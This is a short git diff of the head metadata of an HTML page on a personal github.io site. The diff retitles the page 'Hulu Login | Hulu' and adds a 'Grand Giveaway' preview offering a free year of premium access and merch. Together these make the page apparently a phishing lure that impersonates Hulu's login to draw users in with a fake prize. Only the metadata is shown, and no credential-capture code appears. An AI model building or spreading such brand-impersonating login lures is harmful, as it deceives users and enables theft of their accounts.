Initial commit of Hulu project

--- a/Hulu.html
+++ b/Hulu.html
@@ -3,9 +3,9 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Win 1 Year Premium Access and Merch!</title>
+    <title>Hulu Login | Hulu</title>
     <meta property="og:title" content="Hulu Grand Giveaway!">
-    <meta property="og:description" content="">
+    <meta property="og:description" content="Win 1 Year Premium Access and Merch!">
     <meta property="og:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu_Thumbnqail.png">
     <meta property="og:url" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu.html">
     <meta property="og:type" content="website">
